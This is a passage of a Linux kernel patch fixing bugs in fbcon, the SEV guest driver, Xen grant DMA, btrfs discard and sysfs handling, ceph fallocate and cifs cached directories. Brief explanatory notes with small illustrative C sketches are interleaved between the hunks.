++	if (p->userfont && p->fontdata && (--REFCOUNT(p->fontdata) == 0))
+ 		kfree(p->fontdata - FONT_EXTRA_WORDS * sizeof(int));
+ 	p->fontdata = NULL;
+ 	p->userfont = 0;
+@@ -1172,8 +1170,8 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	struct fb_info *info;
+ 	struct fbcon_ops *ops;
+ 	int idx;
+-	bool free_font = true;
+ 
++	fbcon_free_font(p);
+ 	idx = con2fb_map[vc->vc_num];
+ 
+ 	if (idx == -1)
+@@ -1184,8 +1182,6 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	if (!info)
+ 		goto finished;
+ 
+-	if (info->flags & FBINFO_MISC_FIRMWARE)
+-		free_font = false;
+ 	ops = info->fbcon_par;
+ 
+ 	if (!ops)
+@@ -1197,9 +1193,8 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	ops->initialized = false;
+ finished:
+ 
+-	fbcon_free_font(p, free_font);
+-	if (free_font)
+-		vc->vc_font.data = NULL;
++	fbcon_free_font(p);
++	vc->vc_font.data = NULL;
+ 
+ 	if (vc->vc_hi_font_mask && vc->vc_screenbuf)
+ 		set_vc_hi_font(vc, false);
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 4ec4174e05a3c..7b4e9009f3355 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -377,9 +377,26 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		snp_dev->input.data_npages = certs_npages;
+ 	}
+ 
++	/*
++	 * Increment the message sequence number. There is no harm in doing
++	 * this now because decryption uses the value stored in the response
++	 * structure and any failure will wipe the VMPCK, preventing further
++	 * use anyway.
++	 */
++	snp_inc_msg_seqno(snp_dev);
++
+ 	if (fw_err)
+ 		*fw_err = err;
+ 
++	/*
++	 * If an extended guest request was issued and the supplied certificate
++	 * buffer was not large enough, a standard guest request was issued to
++	 * prevent IV reuse. If the standard request was successful, return -EIO
++	 * back to the caller as would have originally been returned.
++	 */
++	if (!rc && err == SNP_GUEST_REQ_INVALID_LEN)
++		return -EIO;
++
+ 	if (rc) {
+ 		dev_alert(snp_dev->dev,
+ 			  "Detected error from ASP request. rc: %d, fw_err: %llu\n",
+@@ -395,9 +412,6 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		goto disable_vmpck;
+ 	}
+ 
+-	/* Increment to new message sequence after payload decryption was successful. */
+-	snp_inc_msg_seqno(snp_dev);
+-
+ 	return 0;
+ 
+ disable_vmpck:
+diff --git a/drivers/xen/grant-dma-iommu.c b/drivers/xen/grant-dma-iommu.c
+index 16b8bc0c0b33d..6a9fe02c6bfcc 100644
+--- a/drivers/xen/grant-dma-iommu.c
++++ b/drivers/xen/grant-dma-iommu.c
+@@ -16,8 +16,15 @@ struct grant_dma_iommu_device {
+ 	struct iommu_device iommu;
+ };
+ 
+-/* Nothing is really needed here */
+-static const struct iommu_ops grant_dma_iommu_ops;
++static struct iommu_device *grant_dma_iommu_probe_device(struct device *dev)
++{
++	return ERR_PTR(-ENODEV);
++}
++
++/* Nothing is really needed here except a dummy probe_device callback */
++static const struct iommu_ops grant_dma_iommu_ops = {
++	.probe_device = grant_dma_iommu_probe_device,
++};
+ 
+ static const struct of_device_id grant_dma_iommu_of_match[] = {
+ 	{ .compatible = "xen,grant-dma" },
+diff --git a/fs/btrfs/discard.c b/fs/btrfs/discard.c
+index ff2e524d99377..317aeff6c1dac 100644
+--- a/fs/btrfs/discard.c
++++ b/fs/btrfs/discard.c
+@@ -78,6 +78,7 @@ static struct list_head *get_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ static void __add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 				  struct btrfs_block_group *block_group)
+ {
++	lockdep_assert_held(&discard_ctl->lock);
+ 	if (!btrfs_run_discard_work(discard_ctl))
+ 		return;
+ 
+@@ -89,6 +90,8 @@ static void __add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 						      BTRFS_DISCARD_DELAY);
+ 		block_group->discard_state = BTRFS_DISCARD_RESET_CURSOR;
+ 	}
++	if (list_empty(&block_group->discard_list))
++		btrfs_get_block_group(block_group);
+ 
+ 	list_move_tail(&block_group->discard_list,
+ 		       get_discard_list(discard_ctl, block_group));
+@@ -108,8 +111,12 @@ static void add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ static void add_to_discard_unused_list(struct btrfs_discard_ctl *discard_ctl,
+ 				       struct btrfs_block_group *block_group)
+ {
++	bool queued;
++
+ 	spin_lock(&discard_ctl->lock);
+ 
++	queued = !list_empty(&block_group->discard_list);
++
+ 	if (!btrfs_run_discard_work(discard_ctl)) {
+ 		spin_unlock(&discard_ctl->lock);
+ 		return;
+@@ -121,6 +128,8 @@ static void add_to_discard_unused_list(struct btrfs_discard_ctl *discard_ctl,
+ 	block_group->discard_eligible_time = (ktime_get_ns() +
+ 					      BTRFS_DISCARD_UNUSED_DELAY);
+ 	block_group->discard_state = BTRFS_DISCARD_RESET_CURSOR;
++	if (!queued)
++		btrfs_get_block_group(block_group);
+ 	list_add_tail(&block_group->discard_list,
+ 		      &discard_ctl->discard_list[BTRFS_DISCARD_INDEX_UNUSED]);
+ 
+@@ -131,6 +140,7 @@ static bool remove_from_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 				     struct btrfs_block_group *block_group)
+ {
+ 	bool running = false;
++	bool queued = false;
+ 
+ 	spin_lock(&discard_ctl->lock);
+ 
+@@ -140,7 +150,16 @@ static bool remove_from_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 	}
+ 
+ 	block_group->discard_eligible_time = 0;
++	queued = !list_empty(&block_group->discard_list);
+ 	list_del_init(&block_group->discard_list);
++	/*
++	 * If the block group is currently running in the discard workfn, we
++	 * don't want to deref it, since it's still being used by the workfn.
++	 * The workfn will notice this case and deref the block group when it is
++	 * finished.
++	 */
++	if (queued && !running)
++		btrfs_put_block_group(block_group);
+ 
+ 	spin_unlock(&discard_ctl->lock);
+ 
+@@ -214,10 +233,12 @@ again:
+ 	if (block_group && now >= block_group->discard_eligible_time) {
+ 		if (block_group->discard_index == BTRFS_DISCARD_INDEX_UNUSED &&
+ 		    block_group->used != 0) {
+-			if (btrfs_is_block_group_data_only(block_group))
++			if (btrfs_is_block_group_data_only(block_group)) {
+ 				__add_to_discard_list(discard_ctl, block_group);
+-			else
++			} else {
+ 				list_del_init(&block_group->discard_list);
++				btrfs_put_block_group(block_group);
++			}
+ 			goto again;
+ 		}
+ 		if (block_group->discard_state == BTRFS_DISCARD_RESET_CURSOR) {
+@@ -511,6 +532,15 @@ static void btrfs_discard_workfn(struct work_struct *work)
+ 	spin_lock(&discard_ctl->lock);
+ 	discard_ctl->prev_discard = trimmed;
+ 	discard_ctl->prev_discard_time = now;
++	/*
++	 * If the block group was removed from the discard list while it was
++	 * running in this workfn, then we didn't deref it, since this function
++	 * still owned that reference. But we set the discard_ctl->block_group
++	 * back to NULL, so we can use that condition to know that now we need
++	 * to deref the block_group.
++	 */
++	if (discard_ctl->block_group == NULL)
++		btrfs_put_block_group(block_group);
+ 	discard_ctl->block_group = NULL;
+ 	__btrfs_discard_schedule_work(discard_ctl, now, false);
+ 	spin_unlock(&discard_ctl->lock);
+@@ -651,8 +681,12 @@ void btrfs_discard_punt_unused_bgs_list(struct btrfs_fs_info *fs_info)
+ 	list_for_each_entry_safe(block_group, next, &fs_info->unused_bgs,
+ 				 bg_list) {
+ 		list_del_init(&block_group->bg_list);
+-		btrfs_put_block_group(block_group);
+ 		btrfs_discard_queue_work(&fs_info->discard_ctl, block_group);
++		/*
++		 * This put is for the get done by btrfs_mark_bg_unused.
++		 * Queueing discard incremented it for discard's reference.
++		 */
++		btrfs_put_block_group(block_group);
+ 	}
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ }
+@@ -683,6 +717,7 @@ static void btrfs_discard_purge_list(struct btrfs_discard_ctl *discard_ctl)
+ 			if (block_group->used == 0)
+ 				btrfs_mark_bg_unused(block_group);
+ 			spin_lock(&discard_ctl->lock);
++			btrfs_put_block_group(block_group);
+ 		}
+ 	}
+ 	spin_unlock(&discard_ctl->lock);
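
The btrfs discard hunks above make list membership own a reference: the first queueing takes a block-group reference and removal drops it, so a block group can no longer be freed while still linked on a discard list. A toy standalone version of that ownership rule (struct bg_sketch and friends are invented names):

#include <stdio.h>
#include <stdlib.h>

struct bg_sketch {
	int refs;
	int queued;
};

static void bg_get(struct bg_sketch *bg) { bg->refs++; }

static void bg_put(struct bg_sketch *bg)
{
	if (--bg->refs == 0) {
		puts("freeing block group");
		free(bg);
	}
}

static void queue_discard(struct bg_sketch *bg)
{
	if (!bg->queued) {	/* only the first queueing takes a ref */
		bg_get(bg);
		bg->queued = 1;
	}
}

static void unqueue_discard(struct bg_sketch *bg)
{
	if (bg->queued) {
		bg->queued = 0;
		bg_put(bg);	/* drop the list's reference */
	}
}

int main(void)
{
	struct bg_sketch *bg = calloc(1, sizeof(*bg));

	bg->refs = 1;		/* caller's reference */
	queue_discard(bg);
	queue_discard(bg);	/* re-queue: must not double-get */
	unqueue_discard(bg);
	bg_put(bg);		/* caller done; object is freed */
	return 0;
}

The workfn special case in the patch fits the same rule: while the workfn is using the block group it keeps the list's reference alive, and whoever clears discard_ctl->block_group last performs the put.
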
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 3aa04224315eb..fde40112a2593 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1910,6 +1910,9 @@ static int cleaner_kthread(void *arg)
+ 			goto sleep;
+ 		}
+ 
++		if (test_and_clear_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags))
++			btrfs_sysfs_feature_update(fs_info);
++
+ 		btrfs_run_delayed_iputs(fs_info);
+ 
+ 		again = btrfs_clean_one_deleted_snapshot(fs_info);
+diff --git a/fs/btrfs/fs.c b/fs/btrfs/fs.c
+index 5553e1f8afe8e..31c1648bc0b46 100644
+--- a/fs/btrfs/fs.c
++++ b/fs/btrfs/fs.c
+@@ -24,6 +24,7 @@ void __btrfs_set_fs_incompat(struct btrfs_fs_info *fs_info, u64 flag,
+ 				name, flag);
+ 		}
+ 		spin_unlock(&fs_info->super_lock);
++		set_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags);
+ 	}
+ }
+ 
+@@ -46,6 +47,7 @@ void __btrfs_clear_fs_incompat(struct btrfs_fs_info *fs_info, u64 flag,
+ 				name, flag);
+ 		}
+ 		spin_unlock(&fs_info->super_lock);
++		set_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags);
+ 	}
+ }
+ 
+@@ -68,6 +70,7 @@ void __btrfs_set_fs_compat_ro(struct btrfs_fs_info *fs_info, u64 flag,
+ 				name, flag);
+ 		}
+ 		spin_unlock(&fs_info->super_lock);
++		set_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags);
+ 	}
+ }
+ 
+@@ -90,5 +93,6 @@ void __btrfs_clear_fs_compat_ro(struct btrfs_fs_info *fs_info, u64 flag,
+ 				name, flag);
+ 		}
+ 		spin_unlock(&fs_info->super_lock);
++		set_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags);
+ 	}
+ }
+diff --git a/fs/btrfs/fs.h b/fs/btrfs/fs.h
+index 37b86acfcbcf8..3d8156fc8523f 100644
+--- a/fs/btrfs/fs.h
++++ b/fs/btrfs/fs.h
+@@ -125,6 +125,12 @@ enum {
+ 	 */
+ 	BTRFS_FS_NO_OVERCOMMIT,
+ 
++	/*
++	 * Indicate if we have some features changed, this is mostly for
++	 * cleaner thread to update the sysfs interface.
++	 */
++	BTRFS_FS_FEATURE_CHANGED,
++
+ #if BITS_PER_LONG == 32
+ 	/* Indicate if we have error/warn message printed on 32bit systems */
+ 	BTRFS_FS_32BIT_ERROR,
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index 52b346795f660..a5d026041be45 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -2053,20 +2053,33 @@ static int scrub_checksum_tree_block(struct scrub_block *sblock)
+ 	 * a) don't have an extent buffer and
+ 	 * b) the page is already kmapped
+ 	 */
+-	if (sblock->logical != btrfs_stack_header_bytenr(h))
++	if (sblock->logical != btrfs_stack_header_bytenr(h)) {
+ 		sblock->header_error = 1;
+-
+-	if (sector->generation != btrfs_stack_header_generation(h)) {
+-		sblock->header_error = 1;
+-		sblock->generation_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad bytenr, has %llu want %llu",
++			      sblock->logical, sblock->mirror_num,
++			      btrfs_stack_header_bytenr(h),
++			      sblock->logical);
++		goto out;
+ 	}
+ 
+-	if (!scrub_check_fsid(h->fsid, sector))
++	if (!scrub_check_fsid(h->fsid, sector)) {
+ 		sblock->header_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad fsid, has %pU want %pU",
++			      sblock->logical, sblock->mirror_num,
++			      h->fsid, sblock->dev->fs_devices->fsid);
++		goto out;
++	}
+ 
+-	if (memcmp(h->chunk_tree_uuid, fs_info->chunk_tree_uuid,
+-		   BTRFS_UUID_SIZE))
++	if (memcmp(h->chunk_tree_uuid, fs_info->chunk_tree_uuid, BTRFS_UUID_SIZE)) {
+ 		sblock->header_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad chunk tree uuid, has %pU want %pU",
++			      sblock->logical, sblock->mirror_num,
++			      h->chunk_tree_uuid, fs_info->chunk_tree_uuid);
++		goto out;
++	}
+ 
+ 	shash->tfm = fs_info->csum_shash;
+ 	crypto_shash_init(shash);
+@@ -2079,9 +2092,27 @@ static int scrub_checksum_tree_block(struct scrub_block *sblock)
+ 	}
+ 
+ 	crypto_shash_final(shash, calculated_csum);
+-	if (memcmp(calculated_csum, on_disk_csum, sctx->fs_info->csum_size))
++	if (memcmp(calculated_csum, on_disk_csum, sctx->fs_info->csum_size)) {
+ 		sblock->checksum_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad csum, has " CSUM_FMT " want " CSUM_FMT,
++			      sblock->logical, sblock->mirror_num,
++			      CSUM_FMT_VALUE(fs_info->csum_size, on_disk_csum),
++			      CSUM_FMT_VALUE(fs_info->csum_size, calculated_csum));
++		goto out;
++	}
++
++	if (sector->generation != btrfs_stack_header_generation(h)) {
++		sblock->header_error = 1;
++		sblock->generation_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad generation, has %llu want %llu",
++			      sblock->logical, sblock->mirror_num,
++			      btrfs_stack_header_generation(h),
++			      sector->generation);
++	}
+ 
++out:
+ 	return sblock->header_error || sblock->checksum_error;
+ }
+ 
+diff --git a/fs/btrfs/sysfs.c b/fs/btrfs/sysfs.c
+index 45615ce364988..108aa38761860 100644
+--- a/fs/btrfs/sysfs.c
++++ b/fs/btrfs/sysfs.c
+@@ -2272,36 +2272,23 @@ void btrfs_sysfs_del_one_qgroup(struct btrfs_fs_info *fs_info,
+  * Change per-fs features in /sys/fs/btrfs/UUID/features to match current
+  * values in superblock. Call after any changes to incompat/compat_ro flags
+  */
+-void btrfs_sysfs_feature_update(struct btrfs_fs_info *fs_info,
+-		u64 bit, enum btrfs_feature_set set)
++void btrfs_sysfs_feature_update(struct btrfs_fs_info *fs_info)
+ {
+-	struct btrfs_fs_devices *fs_devs;
+ 	struct kobject *fsid_kobj;
+-	u64 __maybe_unused features;
+-	int __maybe_unused ret;
++	int ret;
+ 
+ 	if (!fs_info)
+ 		return;
+ 
+-	/*
+-	 * See 14e46e04958df74 and e410e34fad913dd, feature bit updates are not
+-	 * safe when called from some contexts (eg. balance)
+-	 */
+-	features = get_features(fs_info, set);
+-	ASSERT(bit & supported_feature_masks[set]);
+-
+-	fs_devs = fs_info->fs_devices;
+-	fsid_kobj = &fs_devs->fsid_kobj;
+-
++	fsid_kobj = &fs_info->fs_devices->fsid_kobj;
+ 	if (!fsid_kobj->state_initialized)
+ 		return;
+ 
+-	/*
+-	 * FIXME: this is too heavy to update just one value, ideally we'd like
+-	 * to use sysfs_update_group but some refactoring is needed first.
+-	 */
+-	sysfs_remove_group(fsid_kobj, &btrfs_feature_attr_group);
+-	ret = sysfs_create_group(fsid_kobj, &btrfs_feature_attr_group);
++	ret = sysfs_update_group(fsid_kobj, &btrfs_feature_attr_group);
++	if (ret < 0)
++		btrfs_warn(fs_info,
++			   "failed to update /sys/fs/btrfs/%pU/features: %d",
++			   fs_info->fs_devices->fsid, ret);
+ }
+ 
+ int __init btrfs_init_sysfs(void)
+diff --git a/fs/btrfs/sysfs.h b/fs/btrfs/sysfs.h
+index bacef43f72672..86c7eef128731 100644
+--- a/fs/btrfs/sysfs.h
++++ b/fs/btrfs/sysfs.h
+@@ -19,8 +19,7 @@ void btrfs_sysfs_remove_device(struct btrfs_device *device);
+ int btrfs_sysfs_add_fsid(struct btrfs_fs_devices *fs_devs);
+ void btrfs_sysfs_remove_fsid(struct btrfs_fs_devices *fs_devs);
+ void btrfs_sysfs_update_sprout_fsid(struct btrfs_fs_devices *fs_devices);
+-void btrfs_sysfs_feature_update(struct btrfs_fs_info *fs_info,
+-		u64 bit, enum btrfs_feature_set set);
++void btrfs_sysfs_feature_update(struct btrfs_fs_info *fs_info);
+ void btrfs_kobject_uevent(struct block_device *bdev, enum kobject_action action);
+ 
+ int __init btrfs_init_sysfs(void);
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index b8c52e89688c8..8f8d0fce6e4a3 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -2464,6 +2464,11 @@ int btrfs_commit_transaction(struct btrfs_trans_handle *trans)
+ 	wake_up(&fs_info->transaction_wait);
+ 	btrfs_trans_state_lockdep_release(fs_info, BTRFS_LOCKDEP_TRANS_UNBLOCKED);
+ 
++	/* If we have features changed, wake up the cleaner to update sysfs. */
++	if (test_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags) &&
++	    fs_info->cleaner_kthread)
++		wake_up_process(fs_info->cleaner_kthread);
++
+ 	ret = btrfs_write_and_wait_transaction(trans);
+ 	if (ret) {
+ 		btrfs_handle_fs_error(fs_info, ret,
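
The transaction.c hunk above defers the sysfs feature update to the cleaner thread via a flag plus a wakeup, and the cleaner consumes the flag with test_and_clear_bit(). A trivial single-threaded sketch of that produce-once/consume-once handshake (no locking shown; the kernel version relies on the atomic bit operation):

#include <stdbool.h>
#include <stdio.h>

static bool feature_changed;

/* commit path: record that sysfs is stale and poke the cleaner */
static void commit_sketch(void)
{
	feature_changed = true;
	puts("commit: wake cleaner");
}

/* cleaner body: consume the flag exactly once */
static void cleaner_sketch(void)
{
	if (feature_changed) {	/* test_and_clear_bit() in the patch */
		feature_changed = false;
		puts("cleaner: update sysfs features");
	}
}

int main(void)
{
	commit_sketch();
	cleaner_sketch();
	cleaner_sketch();	/* second pass: nothing to do */
	return 0;
}
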
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index b5cff85925a10..dc39a4b0ec8ec 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -2102,6 +2102,9 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	loff_t endoff = 0;
+ 	loff_t size;
+ 
++	dout("%s %p %llx.%llx mode %x, offset %llu length %llu\n", __func__,
++	     inode, ceph_vinop(inode), mode, offset, length);
++
+ 	if (mode != (FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE))
+ 		return -EOPNOTSUPP;
+ 
+@@ -2136,6 +2139,10 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	if (ret < 0)
+ 		goto unlock;
+ 
++	ret = file_modified(file);
++	if (ret)
++		goto put_caps;
++
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 	ceph_fscache_invalidate(inode, false);
+ 	ceph_zero_pagecache_range(inode, offset, length);
+@@ -2151,6 +2158,7 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	}
+ 	filemap_invalidate_unlock(inode->i_mapping);
+ 
++put_caps:
+ 	ceph_put_cap_refs(ci, got);
+ unlock:
+ 	inode_unlock(inode);
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+index 60399081046a5..75d5e06306ea5 100644
+--- a/fs/cifs/cached_dir.c
++++ b/fs/cifs/cached_dir.c
+@@ -14,6 +14,7 @@
+ 
+ static struct cached_fid *init_cached_dir(const char *path);
+ static void free_cached_dir(struct cached_fid *cfid);
++static void smb2_close_cached_fid(struct kref *ref);
+ 
+ static struct cached_fid *find_or_create_cached_dir(struct cached_fids *cfids,
+ 						    const char *path,
+@@ -181,12 +182,13 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE);
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.fid = pfid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.fid = pfid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -220,8 +222,8 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		}
+ 		goto oshr_free;
+ 	}
+-
+-	atomic_inc(&tcon->num_remote_opens);
++	cfid->tcon = tcon;
++	cfid->is_open = true;
+ 
+ 	o_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
+ 	oparms.fid->persistent_fid = o_rsp->PersistentFileId;
+@@ -233,12 +235,12 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+ 		goto oshr_free;
+ 
+-
+ 	smb2_parse_contexts(server, o_rsp,
+ 			    &oparms.fid->epoch,
+ 			    oparms.fid->lease_key, &oplock,
+ 			    NULL, NULL);
+-
++	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
++		goto oshr_free;
+ 	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+ 	if (le32_to_cpu(qi_rsp->OutputBufferLength) < sizeof(struct smb2_file_all_info))
+ 		goto oshr_free;
+@@ -259,9 +261,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		}
+ 	}
+ 	cfid->dentry = dentry;
+-	cfid->tcon = tcon;
+ 	cfid->time = jiffies;
+-	cfid->is_open = true;
+ 	cfid->has_lease = true;
+ 
+ oshr_free:
+@@ -271,7 +271,7 @@ oshr_free:
+ 	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+ 	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+ 	spin_lock(&cfids->cfid_list_lock);
+-	if (!cfid->has_lease) {
++	if (rc && !cfid->has_lease) {
+ 		if (cfid->on_list) {
+ 			list_del(&cfid->entry);
+ 			cfid->on_list = false;
+@@ -280,13 +280,27 @@ oshr_free:
+ 		rc = -ENOENT;
+ 	}
+ 	spin_unlock(&cfids->cfid_list_lock);
++	if (!rc && !cfid->has_lease) {
++		/*
++		 * We are guaranteed to have two references at this point.
++		 * One for the caller and one for a potential lease.
++		 * Release the Lease-ref so that the directory will be closed
++		 * when the caller closes the cached handle.
++		 */
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
+ 	if (rc) {
++		if (cfid->is_open)
++			SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++				   cfid->fid.volatile_fid);
+ 		free_cached_dir(cfid);
+ 		cfid = NULL;
+ 	}
+ 
+-	if (rc == 0)
++	if (rc == 0) {
+ 		*ret_cfid = cfid;
++		atomic_inc(&tcon->num_remote_opens);
++	}
+ 
+ 	return rc;
+ }
+@@ -335,6 +349,7 @@ smb2_close_cached_fid(struct kref *ref)
+ 	if (cfid->is_open) {
+ 		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+ 			   cfid->fid.volatile_fid);
++		atomic_dec(&cfid->tcon->num_remote_opens);
+ 	}
+ 
+ 	free_cached_dir(cfid);
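
The cifs conversions above (and in the following files) replace field-by-field setup of cifs_open_parms with a single compound-literal assignment. The reason the explicit ".reconnect = false" lines could be dropped is a C guarantee: members not named in the initializer are zero-initialized. A self-contained demonstration (the struct below is a stand-in, not the real cifs_open_parms):

#include <stdbool.h>
#include <stdio.h>

struct open_parms_sketch {
	int desired_access;
	int disposition;
	bool reconnect;
};

int main(void)
{
	struct open_parms_sketch oparms;

	/*
	 * Compound-literal assignment: every member not listed here is
	 * zero-initialized, so .reconnect is false without saying so.
	 */
	oparms = (struct open_parms_sketch) {
		.desired_access = 1,
		.disposition = 2,
	};

	printf("reconnect = %d\n", oparms.reconnect);	/* prints 0 */
	return 0;
}

Assigning the whole struct at once also means stale values from an earlier use of the variable cannot leak through, which field-by-field assignment does not guarantee.
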
+diff --git a/fs/cifs/cifsacl.c b/fs/cifs/cifsacl.c
+index bbf58c2439da2..3cc3471199f54 100644
+--- a/fs/cifs/cifsacl.c
++++ b/fs/cifs/cifsacl.c
+@@ -1428,14 +1428,15 @@ static struct cifs_ntsd *get_cifs_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 	tcon = tlink_tcon(tlink);
+ 	xid = get_xid();
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = READ_CONTROL;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = READ_CONTROL,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (!rc) {
+@@ -1494,14 +1495,15 @@ int set_cifs_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+ 	else
+ 		access_flags = WRITE_DAC;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = access_flags;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc) {
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index 1207b39686fb9..e75184544ecb4 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -670,11 +670,21 @@ static inline int get_dfs_path(const unsigned int xid, struct cifs_ses *ses,
+ int match_target_ip(struct TCP_Server_Info *server,
+ 		    const char *share, size_t share_len,
+ 		    bool *result);
+-
+-int cifs_dfs_query_info_nonascii_quirk(const unsigned int xid,
+-				       struct cifs_tcon *tcon,
+-				       struct cifs_sb_info *cifs_sb,
+-				       const char *dfs_link_path);
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink);
++#else
++static inline int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	*islink = false;
++	return 0;
++}
+ #endif
+ 
+ static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 23f10e0d6e7e3..8c014a3ff9e00 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -5372,14 +5372,15 @@ CIFSSMBSetPathInfoFB(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_fid fid;
+ 	int rc;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = fileName;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = fileName,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index b2a04b4e89a5e..af49ae53aaf40 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
